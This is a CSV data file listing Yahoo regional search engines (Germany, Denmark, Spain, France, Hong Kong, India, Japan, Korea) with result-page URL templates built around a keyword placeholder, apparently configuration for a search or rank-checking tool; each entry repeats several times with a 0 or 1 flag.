"International","Yahoo DE 2 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=21&h=W&page=2","0"
"International","Yahoo DE 3 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=41&h=W&page=3","1"
"International","Yahoo DE 3 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=41&h=W&page=3","0"
"International","Yahoo DE 3 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=41&h=W&page=3","0"
"International","Yahoo DE 3 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=41&h=W&page=3","0"
"International","Yahoo DE 3 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=41&h=W&page=3","0"
"International","Yahoo DE 3 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=41&h=W&page=3","0"
"International","Yahoo DE 4 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=61&h=W&page=4","1"
"International","Yahoo DE 4 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=61&h=W&page=4","0"
"International","Yahoo DE 4 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=61&h=W&page=4","0"
"International","Yahoo DE 4 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=61&h=W&page=4","0"
"International","Yahoo DE 4 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=61&h=W&page=4","0"
"International","Yahoo DE 4 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=61&h=W&page=4","0"
"International","Yahoo DE 5 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=81&h=W&page=5","1"
"International","Yahoo DE 5 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=81&h=W&page=5","0"
"International","Yahoo DE 5 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=81&h=W&page=5","0"
"International","Yahoo DE 5 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=81&h=W&page=5","0"
"International","Yahoo DE 5 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=81&h=W&page=5","0"
"International","Yahoo DE 5 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=81&h=W&page=5","0"
"International","Yahoo DK","http://dk.search.yahoo.com/search/dk?p={SEARCH_KEYWORD}&y=y","1"
"International","Yahoo DK","http://dk.search.yahoo.com/search/dk?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo DK","http://dk.search.yahoo.com/search/dk?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo DK","http://dk.search.yahoo.com/search/dk?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo DK","http://dk.search.yahoo.com/search/dk?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo DK","http://dk.search.yahoo.com/search/dk?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo DK 2 (Next 20)","http://dk.search.yahoo.com/search/dk?p={SEARCH_KEYWORD}&y=y&hc=0&hs=87&b=21&h=W&page=2","1"
"International","Yahoo DK 2 (Next 20)","http://dk.search.yahoo.com/search/dk?p={SEARCH_KEYWORD}&y=y&hc=0&hs=87&b=21&h=W&page=2","0"
"International","Yahoo DK 2 (Next 20)","http://dk.search.yahoo.com/search/dk?p={SEARCH_KEYWORD}&y=y&hc=0&hs=87&b=21&h=W&page=2","0"
"International","Yahoo DK 2 (Next 20)","http://dk.search.yahoo.com/search/dk?p={SEARCH_KEYWORD}&y=y&hc=0&hs=87&b=21&h=W&page=2","0"
"International","Yahoo DK 2 (Next 20)","http://dk.search.yahoo.com/search/dk?p={SEARCH_KEYWORD}&y=y&hc=0&hs=87&b=21&h=W&page=2","0"
"International","Yahoo DK 2 (Next 20)","http://dk.search.yahoo.com/search/dk?p={SEARCH_KEYWORD}&y=y&hc=0&hs=87&b=21&h=W&page=2","0"
"International","Yahoo ES","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y","1"
"International","Yahoo ES","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo ES","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo ES","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo ES","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo ES","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo ES 2 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=21&h=W&page=2","1"
"International","Yahoo ES 2 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=21&h=W&page=2","0"
"International","Yahoo ES 2 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=21&h=W&page=2","0"
"International","Yahoo ES 2 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=21&h=W&page=2","0"
"International","Yahoo ES 2 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=21&h=W&page=2","0"
"International","Yahoo ES 2 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=21&h=W&page=2","0"
"International","Yahoo ES 3 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=41&h=W&page=3","1"
"International","Yahoo ES 3 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=41&h=W&page=3","0"
"International","Yahoo ES 3 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=41&h=W&page=3","0"
"International","Yahoo ES 3 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=41&h=W&page=3","0"
"International","Yahoo ES 3 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=41&h=W&page=3","0"
"International","Yahoo ES 3 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=41&h=W&page=3","0"
"International","Yahoo ES 4 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=61&h=W&page=4","1"
"International","Yahoo ES 4 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=61&h=W&page=4","0"
"International","Yahoo ES 4 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=61&h=W&page=4","0"
"International","Yahoo ES 4 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=61&h=W&page=4","0"
"International","Yahoo ES 4 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=61&h=W&page=4","0"
"International","Yahoo ES 4 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=61&h=W&page=4","0"
"International","Yahoo ES 5 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=81&h=W&page=5","1"
"International","Yahoo ES 5 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=81&h=W&page=5","1"
"International","Yahoo ES 5 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=81&h=W&page=5","0"
"International","Yahoo ES 5 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=81&h=W&page=5","0"
"International","Yahoo ES 5 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=81&h=W&page=5","0"
"International","Yahoo ES 5 (Next 20)","http://es.search.yahoo.com/search/es?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1750&b=81&h=W&page=5","0"
"International","Yahoo FR","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=1&h=W","1"
"International","Yahoo FR","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=1&h=W","0"
"International","Yahoo FR","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=1&h=W","0"
"International","Yahoo FR","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=1&h=W","0"
"International","Yahoo FR","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=1&h=W","0"
"International","Yahoo FR","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=1&h=W","0"
"International","Yahoo FR 2 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=21&h=W&page=2","1"
"International","Yahoo FR 2 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=21&h=W&page=2","0"
"International","Yahoo FR 2 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=21&h=W&page=2","0"
"International","Yahoo FR 2 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=21&h=W&page=2","0"
"International","Yahoo FR 2 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=21&h=W&page=2","0"
"International","Yahoo FR 2 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=21&h=W&page=2","0"
"International","Yahoo FR 3 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=41&h=W&page=3","1"
"International","Yahoo FR 3 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=41&h=W&page=3","0"
"International","Yahoo FR 3 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=41&h=W&page=3","0"
"International","Yahoo FR 3 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=41&h=W&page=3","0"
"International","Yahoo FR 3 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=41&h=W&page=3","0"
"International","Yahoo FR 3 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=41&h=W&page=3","0"
"International","Yahoo FR 4 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=61&h=W&page=4","1"
"International","Yahoo FR 4 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=61&h=W&page=4","0"
"International","Yahoo FR 4 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=61&h=W&page=4","0"
"International","Yahoo FR 4 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=61&h=W&page=4","0"
"International","Yahoo FR 4 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=61&h=W&page=4","0"
"International","Yahoo FR 4 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=61&h=W&page=4","0"
"International","Yahoo FR 5 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=81&h=W&page=5","1"
"International","Yahoo FR 5 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=81&h=W&page=5","0"
"International","Yahoo FR 5 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=81&h=W&page=5","0"
"International","Yahoo FR 5 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=81&h=W&page=5","0"
"International","Yahoo FR 5 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=81&h=W&page=5","0"
"International","Yahoo FR 5 (Next 20)","http://fr.search.yahoo.com/search/fr?p={SEARCH_KEYWORD}&y=y&hc=9&hs=1780000&b=81&h=W&page=5","0"
"International","Yahoo HK","http://search.hk.yahoo.com/search/openfind?p={SEARCH_KEYWORD}&h=W&hc=0&hs=0&hn=0","1"
"International","Yahoo HK","http://search.hk.yahoo.com/search/openfind?p={SEARCH_KEYWORD}&h=W&hc=0&hs=0&hn=0","0"
"International","Yahoo HK","http://search.hk.yahoo.com/search/openfind?p={SEARCH_KEYWORD}&h=W&hc=0&hs=0&hn=0","0"
"International","Yahoo HK","http://search.hk.yahoo.com/search/openfind?p={SEARCH_KEYWORD}&h=W&hc=0&hs=0&hn=0","0"
"International","Yahoo HK","http://search.hk.yahoo.com/search/openfind?p={SEARCH_KEYWORD}&h=W&hc=0&hs=0&hn=0","0"
"International","Yahoo HK","http://search.hk.yahoo.com/search/openfind?p={SEARCH_KEYWORD}&h=W&hc=0&hs=0&hn=0","0"
"International","Yahoo HK 2 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=2&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","1"
"International","Yahoo HK 2 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=2&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","0"
"International","Yahoo HK 2 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=2&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","0"
"International","Yahoo HK 2 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=2&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","0"
"International","Yahoo HK 2 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=2&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","0"
"International","Yahoo HK 2 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=2&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","0"
"International","Yahoo HK 3 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=3&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","1"
"International","Yahoo HK 3 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=3&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","0"
"International","Yahoo HK 3 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=3&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","0"
"International","Yahoo HK 3 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=3&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","0"
"International","Yahoo HK 3 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=3&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","0"
"International","Yahoo HK 3 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=3&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","0"
"International","Yahoo HK 4 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=4&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","1"
"International","Yahoo HK 4 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=4&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","0"
"International","Yahoo HK 4 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=4&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","0"
"International","Yahoo HK 4 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=4&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","0"
"International","Yahoo HK 4 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=4&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","0"
"International","Yahoo HK 4 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=4&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","0"
"International","Yahoo HK 5 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=5&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","1"
"International","Yahoo HK 5 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=5&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","0"
"International","Yahoo HK 5 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=5&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","0"
"International","Yahoo HK 5 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=5&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","0"
"International","Yahoo HK 5 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=5&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","0"
"International","Yahoo HK 5 (Next 10)","http://hk.websearch.yahoo.com/search/openfind?o_p=5&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&u=&hc=0&hs=0&hn=0","0"
"International","Yahoo IN","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y","1"
"International","Yahoo IN","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo IN","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo IN","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo IN","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo IN","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo IN 2 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=21&h=c","1"
"International","Yahoo IN 2 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=21&h=c","0"
"International","Yahoo IN 2 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=21&h=c","0"
"International","Yahoo IN 2 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=21&h=c","0"
"International","Yahoo IN 2 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=21&h=c","0"
"International","Yahoo IN 2 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=21&h=c","0"
"International","Yahoo IN 3 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=41&h=c","1"
"International","Yahoo IN 3 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=41&h=c","0"
"International","Yahoo IN 3 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=41&h=c","0"
"International","Yahoo IN 3 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=41&h=c","0"
"International","Yahoo IN 3 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=41&h=c","0"
"International","Yahoo IN 3 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=41&h=c","0"
"International","Yahoo IN 4 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=61&h=c","1"
"International","Yahoo IN 4 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=61&h=c","0"
"International","Yahoo IN 4 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=61&h=c","0"
"International","Yahoo IN 4 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=61&h=c","0"
"International","Yahoo IN 4 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=61&h=c","0"
"International","Yahoo IN 4 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=61&h=c","0"
"International","Yahoo IN 5 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=81&h=c","1"
"International","Yahoo IN 5 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=81&h=c","0"
"International","Yahoo IN 5 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=81&h=c","0"
"International","Yahoo IN 5 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=81&h=c","0"
"International","Yahoo IN 5 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=81&h=c","0"
"International","Yahoo IN 5 (Next 20)","http://in.search.yahoo.com/search/in?p={SEARCH_KEYWORD}&y=y&hc=139&hs=4615&b=81&h=c","0"
"International","Yahoo JP","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0","1"
"International","Yahoo JP","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0","0"
"International","Yahoo JP","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0","0"
"International","Yahoo JP","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0","0"
"International","Yahoo JP","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0","0"
"International","Yahoo JP","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0","0"
"International","Yahoo JP 2 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=20","1"
"International","Yahoo JP 2 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=20","0"
"International","Yahoo JP 2 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=20","0"
"International","Yahoo JP 2 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=20","0"
"International","Yahoo JP 2 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=20","0"
"International","Yahoo JP 2 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=20","0"
"International","Yahoo JP 3 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=40","1"
"International","Yahoo JP 3 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=40","0"
"International","Yahoo JP 3 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=40","0"
"International","Yahoo JP 3 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=40","0"
"International","Yahoo JP 3 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=40","0"
"International","Yahoo JP 3 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=40","1"
"International","Yahoo JP 4 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=60","1"
"International","Yahoo JP 4 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=60","0"
"International","Yahoo JP 4 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=60","0"
"International","Yahoo JP 4 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=60","0"
"International","Yahoo JP 4 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=60","0"
"International","Yahoo JP 4 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=60","0"
"International","Yahoo JP 5 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=80","1"
"International","Yahoo JP 5 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=80","0"
"International","Yahoo JP 5 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=80","0"
"International","Yahoo JP 5 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=80","0"
"International","Yahoo JP 5 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=80","0"
"International","Yahoo JP 5 (Next 20)","http://websearch.yahoo.co.jp/bin/query?p={SEARCH_KEYWORD}&hc=0&hs=0&b=80","0"
"International","Yahoo KR","http://kr.search.yahoo.com/search?p={SEARCH_KEYWORD}","1"
"International","Yahoo KR","http://kr.search.yahoo.com/search?p={SEARCH_KEYWORD}","0"
"International","Yahoo KR","http://kr.search.yahoo.com/search?p={SEARCH_KEYWORD}","0"
"International","Yahoo KR","http://kr.search.yahoo.com/search?p={SEARCH_KEYWORD}","0"
"International","Yahoo KR","http://kr.search.yahoo.com/search?p={SEARCH_KEYWORD}","0"
"International","Yahoo KR","http://kr.search.yahoo.com/search?p={SEARCH_KEYWORD}","0"
"International","Yahoo KR 2 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=16","1"
"International","Yahoo KR 2 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=16","0"
"International","Yahoo KR 2 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=16","0"
"International","Yahoo KR 2 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=16","0"
"International","Yahoo KR 2 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=16","0"
"International","Yahoo KR 2 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=16","0"
